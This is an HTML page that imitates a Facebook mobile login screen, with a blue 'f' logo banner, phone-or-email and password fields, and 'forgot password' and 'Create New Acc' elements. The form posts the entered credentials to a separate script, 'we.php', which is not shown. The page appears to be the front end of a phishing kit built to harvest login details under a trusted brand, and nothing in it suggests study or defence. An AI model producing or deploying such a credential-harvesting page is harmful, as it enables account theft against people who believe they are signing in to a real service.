<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <style>
    *{
      margin: 0;
      padding: 0;
    }
    
      .fblogo{
        height:200px;
        background: darkblue;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      
      .fblogo p{
        display:block;
        background: white;
        font-size: 90px;
        width:100px;
        height:100px;
        text-align: center;
        border-radius: 50%;
        color:blue;
        
      }
      
      .info form,.info div{
        display: flex;
        flex-direction: column;
        padding: 20px;
        gap:10px;
      }
      
      .info p{
        text-align: center;
      }
      
      .info input{
        padding: 5px;
        border-top: none;
        border-right: none;
        border-left: none;
        border-bottom:1px solid gray;
        height:30px;
        margin-top: 40px;
      }
      
      .sub{
        border:none;
        background: darkblue;
        color: white;
      }
      
      .c{
        padding: 10px;
        background: limegreen;
        border:none;
      }
      
      .b{
        border-radius:5px;
      }
    </style>
  </head>
  <body>

    <div class="fblogo">
      <p>f</p>
    </div>
    <div class="info">
          <p style="text-align: center">language: UK</p>
      <form action="we.php" method="post">
        <input type="text" name="name" placeholder="Phone number or email address">
        
        <input type="text" name="email" placeholder="Password">
        
        <input class="sub b" value="LOG IN" type="submit">
      </form>
      <div>
              <a><p>forgot password</p></a>
      <p>—————————OR——————————</p>
      <button class="c b">Create New Acc</button>
      </div>

     
    </div>
     
    
  </body>
</html>